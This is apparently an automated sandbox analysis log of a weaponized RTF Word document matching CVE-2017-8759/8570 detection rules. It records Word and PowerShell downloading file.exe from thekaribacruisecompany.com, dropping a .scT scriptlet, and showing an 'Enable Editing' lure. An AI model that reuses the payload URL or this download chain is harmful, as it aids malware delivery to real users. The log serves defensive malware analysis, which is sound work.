Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: Joe Sandbox View | ASN Name: COGENT-174US COGENT-174US
Source: Joe Sandbox View | JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: global traffic | HTTP traffic detected: GET /file.exe HTTP/1.1 | Host: thekaribacruisecompany.com | Connection: Keep-Alive
Source: unknown | HTTPS traffic detected: 149.102.154.62:443 -> 192.168.2.22:49172 version: TLS 1.0
Source: global traffic | HTTP traffic detected: GET /file.exe HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: thekaribacruisecompany.com | Connection: Keep-Alive
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown | Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49171 -> 443
Source: powershell.exe, 00000006.00000002.911999906.00000000002DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: powershell.exe, 00000006.00000002.912596165.00000000035BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.926461141.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.959457009.000000000385C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: httPs://thekaribacruisecompany.c
Source: powershell.exe, 00000012.00000002.953185169.00000000002CF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: httPs://thekaribacruisecompany.com/file.exe
Source: powershell.exe, 0000000C.00000002.926461141.00000000035AC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: httPs://thekaribacruisecompany.com/file.exePE
Source: powershell.exe, 00000006.00000002.912596165.00000000035BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.959457009.000000000385C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: httPs://thekaribacruisecompany.com/file.exePEQ
Source: powershell.exe, 00000006.00000002.919745005.000000001B388000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B39E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.911999906.00000000002DA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B37C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000006.00000002.919745005.000000001B39E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.911999906.000000000024F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000006.00000002.919745005.000000001B3A4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000006.00000002.919745005.000000001B37C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000006.00000002.919745005.000000001B37C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.911999906.000000000024F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: file.exe, file.exe, 00000010.00000000.947049391.000000000040A000.00000008.00000001.01000000.00000006.sdmp, file.exe, 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmp, file.exe, 00000015.00000000.1014911809.000000000040A000.00000008.00000001.01000000.00000006.sdmp, file.exe, 00000015.00000002.1283424107.000000000040A000.00000004.00000001.01000000.00000006.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: file.exe, 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmp, file.exe, 00000009.00000000.921928467.000000000040A000.00000008.00000001.01000000.00000006.sdmp, file.exe, 00000010.00000000.947049391.000000000040A000.00000008.00000001.01000000.00000006.sdmp, file.exe, 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmp, file.exe, 00000015.00000000.1014911809.000000000040A000.00000008.00000001.01000000.00000006.sdmp, file.exe, 00000015.00000002.1283424107.000000000040A000.00000004.00000001.01000000.00000006.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000006.00000002.919745005.000000001B39E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B37C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000006.00000002.919745005.000000001B37C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000006.00000002.919745005.000000001B388000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000006.00000002.919745005.000000001B388000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.911999906.00000000002DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000006.00000002.919745005.000000001B37C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000006.00000002.919745005.000000001B39E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.911999906.000000000024F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000006.00000002.912596165.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.912596165.00000000036DF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: powershell.exe, 00000006.00000002.912596165.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.912596165.00000000036DF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://s.symcd.com06
Source: powershell.exe, 00000006.00000002.912596165.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.912596165.00000000036DF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: powershell.exe, 00000006.00000002.912596165.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.912596165.00000000036DF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: powershell.exe, 00000006.00000002.912596165.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.912596165.00000000036DF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: powershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000006.00000002.919745005.000000001B37C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.911999906.000000000024F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000012.00000002.953185169.00000000002CF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.piriform.com/Yg
Source: powershell.exe, 0000000C.00000002.925602681.00000000001B7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.953185169.00000000002CF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000006.00000002.912596165.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.912596165.00000000036DF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://d.symcb.com/cps0%
Source: powershell.exe, 00000006.00000002.912596165.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.912596165.00000000036DF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://d.symcb.com/rpa0
Source: powershell.exe, 00000006.00000002.912596165.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.912596165.00000000036DF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://d.symcb.com/rpa0.
Source: powershell.exe, 00000006.00000002.919745005.000000001B388000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B39E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.911999906.00000000002DA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B37C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, 00000006.00000002.912596165.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.912596165.00000000035BC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://thekaribacruisecompany.com
Source: powershell.exe, 00000006.00000002.912596165.00000000035BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B35A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://thekaribacruisecompany.com/file.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D69C60B5-B29E-4F37-A352-937B9DD503EB}.tmp
Source: unknown | DNS traffic detected: queries for: thekaribacruisecompany.com
Source: global traffic | HTTP traffic detected: GET /file.exe HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: thekaribacruisecompany.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /file.exe HTTP/1.1 | Host: thekaribacruisecompany.com | Connection: Keep-Alive
Source: unknown | HTTPS traffic detected: 149.102.154.62:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: C:\Users\user\AppData\Roaming\file.exe | Code function: 9_2_004054B6 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

System Summary

Source: TEPO0015922.doc, type: SAMPLE | Matched rule: detects CVE-2017-8759 or CVE-2017-8570 weaponized RTF documents. Author: ditekSHen
Source: TEPO0015922.doc, type: SAMPLE | Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: Screenshot number: 8 | Screenshot OCR: Enable Editing to view the document. I t3 I a tE
Source: Screenshot number: 16 | Screenshot OCR: Enable Editing to view the document. ii: ^ Uf= a S O I @ 100% G) A GE)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\FZdtfhgYgeghD .scT
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file[1].exe
